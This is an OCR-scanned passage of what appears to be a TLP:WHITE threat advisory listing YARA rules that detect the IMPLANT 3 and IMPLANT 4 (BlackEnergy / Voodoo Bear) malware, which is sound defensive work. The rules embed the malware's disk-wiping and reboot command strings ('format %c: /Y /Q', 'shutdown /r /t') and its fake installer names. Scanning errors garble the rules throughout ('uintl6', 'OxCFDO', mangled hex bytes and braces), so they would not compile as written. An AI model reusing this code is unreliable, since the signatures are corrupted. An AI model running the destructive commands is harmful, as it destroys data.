$base_key_b_array = {3B C6 73 OF 8B 07 85 CO 74 02 FF DO 83 C7 04 3B FE 72 FI 5F 5E C3 8B 
FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B FF 55 8B EC 83 EC 10 A1 33 35 } 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) = 0x6674725C) and any of them 


Rule IMPLANT_3_v3 


strings: 

$STR1 = ".?AVAgentKernel@@" 

$STR2 = ". ? AVLAgentModule @ @" 

$STR3 = "AgentKernel" 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and any of them 

} 
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The following YARA rules detect BlackEnergy / Voodoo Bear, referred to as IMPLANT 4 with rule 
naming convention. 


IMPLANT 4 Rules: 


Rule IMPLANT_4_vl 


strings: 

$STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64 C6 45 DA 76 C6 45 
DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF 32 C6 45 E0 2EE9 ?? ?? ?? ??} $STR2 = {C7 
45 EC 5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00} 

condition: 


(uintl6(0)== 0x5A4D or uintl6(0) == OxCFDO or uintl6(0)== 0xC3D4 or uint32(0) == 0x46445025 or 
uint3 

2(1) == 0x6674725C) and 1 of them 


Rule IMPLANT_4_v2 

{ 

strings: 

$BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64} 

$BUILD_ADVAPI32 = {61 64 76 61 ?????? 70 69 33 32} 

$CONSTANT = {26 80 AC C8} 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 

} 
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Rule IMPLANT_4_v3 


strings: 

$al = "Adobe Flash Player Installer" wide nocase 
$a3 = "regedt32.exe" wide nocase 
$a4 = "WindowsSysUtility" wide nocase 
$a6 = "USB MDM Driver" wide nocase 

$bl = {00 05 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 
28 0A 3F 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 04 00 
00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 
1C 02 00 00 01 00 30 00 30 00 31 00 35 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 
00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 
73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 
00 46 00 OF 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 
00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00 69 00 76 00 65 00 
72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 
00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 
4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 
00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 
00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 
69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 
00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 
65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 
00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 
00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 
65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 
00 35 00 31 00 32 00 00 00 1C 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 
4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 
00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 
00 69 00 6F 00 6E 00 00 00 46 00 OF 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 
69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 
00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 
72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 
00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 
72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 
43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 
00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 
64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 


22 of 56 


TLP:WHITE 




TLP:WHITE 


00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 
20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 
00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 
64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 
00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 48 00 00 00 01 00 56 00 61 00 72 00 46 00 69 
00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 28 00 08 00 00 00 54 00 72 00 61 00 6E 00 73 00 
6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 15 00 BO 04 09 04 BO 04} 

$b2 = {34 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 03 00 03 00 04 00 02 00 03 00 03 00 04 00 
02 00 3F 00 00 00 00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 02 00 00 
00 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 70 
02 00 00 00 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4A 00 15 00 01 00 43 00 6F 00 
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 53 00 6F 00 6C 00 69 00 64 00 20 
00 53 00 74 00 61 00 74 00 65 00 20 00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B 00 73 00 00 00 00 00 
62 00 ID 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 
00 6E 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 
6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 
00 30 00 08 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 
33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 32 00 09 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 
00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 
00 00 76 00 29 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 
00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 41 
00 64 00 6F 00 62 00 65 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 73 00 20 00 49 00 6E 00 63 00 
6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 65 00 64 00 00 00 00 00 3A 00 09 00 01 00 4F 00 72 00 69 
00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 
73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 5A 00 ID 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 
00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 
73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 
00 65 00 72 00 00 00 00 00 34 00 08 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 
00 73 00 69 00 6F 00 6E 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 44 00 00 00 00 00 
56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 
00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 46 45 32 58} 

$b3 = {C8 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 OA 01 00 05 00 88 15 
28 OA 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 
01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 04 
02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 
00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 
48 00 10 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 
6E 00 00 00 00 00 49 00 44 00 45 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 
72 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 
00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 
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78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 
00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 
67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 
20 00 32 00 30 00 30 00 39 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 
4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 
00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 
20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 
00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 
30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 
65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 
00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04} 

$b4 = {9C 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 06 00 01 40 BO ID 01 00 06 00 01 40 
BO ID 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 02 00 
00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 
D6 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 
00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 
73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 
00 58 00 18 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 
00 6E 00 00 00 00 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6F 
00 72 00 20 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 6C 00 26 00 01 00 46 00 69 00 6C 00 
65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 
00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 20 00 28 00 77 00 69 00 6E 00 37 00 5F 00 72 00 74 00 
6D 00 2E 00 30 00 39 00 30 00 37 00 31 00 33 00 2D 00 31 00 32 00 35 00 35 00 29 00 00 00 3A 00 OD 
00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 72 00 65 00 
67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 80 00 2E 00 01 00 4C 00 65 
00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 
69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 
69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 
00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00 42 00 OD 00 01 00 4F 00 72 00 69 00 67 00 
69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 65 00 67 00 65 
00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 00 
64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 
00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00 
72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 42 00 OF 
00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 36 
00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 00 00 00 00 44 00 
00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 
00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 BO 04} 

$b5 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 ID 00 00 05 00 6A 
44 B1 ID 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02 
00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 
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00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 
6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 
00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 
00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 
6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 
00 69 00 6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 

72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 
00 37 00 35 00 31 00 34 00 20 00 28 00 77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 
6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00 31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 
00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 6D 00 

73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 
00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 
6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 
00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 
76 00 65 00 64 00 2E 00 00 00 40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 
00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 
65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 
00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00 73 00 55 00 74 00 69 00 
6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00 42 00 OF 
00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 
00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 
00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 
00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 BO 04} 

$b6 = {D4 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 OA 01 00 05 00 88 15 
28 OA 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 02 00 00 
01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 10 
02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 
00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 
4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 
00 6E 00 00 00 00 00 53 00 65 00 72 00 69 00 61 00 6C 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 

72 00 69 00 76 00 65 00 72 00 00 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 

73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 
00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 
30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 
00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 
00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 34 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 
00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 
6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 
00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 
OE 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 
00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 
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01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 
00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04} 

condition: 

(uintl6(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (((any of ($a*)) and 
(uint32(uint32(0x3C)+8) == 0x00000000)) or (for any of ($b*): ($ in 
(uint32(uint32(0x3C)+248+(40*(uint 16(uint32(0x3C)+6)- 
l)+20))..(uint32(uint32(0x3C)+248+(40*(uintl6(uint32(0x3C)+6)- 

1 )+20))+uint32(uint32(0x3C)+248+(40*(uint 16(uint32(0x3C)+6) -1)+16))))))) 


Rule IMPLANT_4_v4 

{ 

strings: 

$DK_formatl = "/c format %c: /Y /Q" ascii 
$DK_format2 = 7c format %c: /Y /X /FS:NTFS" ascii 
$DK_physicaldrive = "PhysicalDrive%d" wide 
$DK_shutdown = "shutdown /r /t %d" 

$MZ = {4d 5a} 
condition: 

$MZ at 0 and all of ($DK*) 


Rule IMPLANT_4_v5 


strings: 

$GEN_HASH = {OF BE C9 Cl CO 07 33 Cl} 
condition: 
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(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 

} 


Rule IMPLANT_4_v6 


strings: 

$STR1 = "DispatchCommand" wide ascii 
$STR2 = "DispatchEvent" wide ascii 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 

} 

Rule IMPLANT_4_v7 

{ 

strings: 


$sbl = 

= [C7 

[1-5] 

33 

32 

2E 

64 

C7 

[1-5] 

77 73 32 

5F 66 Cl [1-5] 6C 6C} 

$sb2 = 

= [C7 

[1-5] 

75 

73 

65 

72 

Cl 

[1-5] 

33 32 2E 

64 66 C7 [1-5] 6C 6C} 

$sb3 = 

= [C7 

[1-5] 

61 

64 

76 

61 

Cl 

[1-5] 

70 69 33 

32 C7 [1-5] 2E 64 6C 6C[ 

$sb4 = 

= [C7 

[1-5] 

77 

69 

6E 

69 

Cl 

[1-5] 

6E 65 74 

2E Cl [1-5] 64 6C 6C} 

$sb5 = 

= [C7 

[1-5] 

73 

68 

65 

6C 

Cl 

[1-5] 

6C 33 32 

2E Cl [1-5] 64 6C 6C[ 

$sb6 = 

= [C7 

[1-5] 

70 

73 

61 

70 

Cl 

[1-5] 

69 2E 64 

6C 66 Cl [1-5] 6C[ 

$sb7 = 

= [C7 

[1-5] 

6E 

65 

74 

61 

Cl 

[1-5] 

70 69 33 

32 C7 [1-5] 2E 64 6C 6C[ 

$sb8 = 

= [C7 

[1-5] 

76 

65 

72 

73 

Cl 

[1-5] 

69 6F 6E 

2E C7 [1-5] 64 6C 6C} 

$sb9 = 

= [C7 

[1-5] 

6F 

6C 

'65 

61 

Cl 

[1-5] 

75 74 33 

32 C7 [1-5] 2E 64 6C 6C} 


$sbl0 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C[ 
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condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and 3 of them 


Rule IMPLANT_4_v8 


strings: 

$fl = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 DO 4A 41 
3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 
C7 04 03 5C 20 56 57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 CO 50 68 80 00 00 00 6A 02 50 50 68 
00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50 
6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18} 

$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8 
33 CO 89 45 F4 8B 55 0C 3B 55 F4 OF 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 
8B 42 04 83 E8 08 D1 E8 89 45 F8 8B 4D EC 83 Cl 08 89 4D FC} 

$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB 
4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 EO 8B E8 8B F7 83 
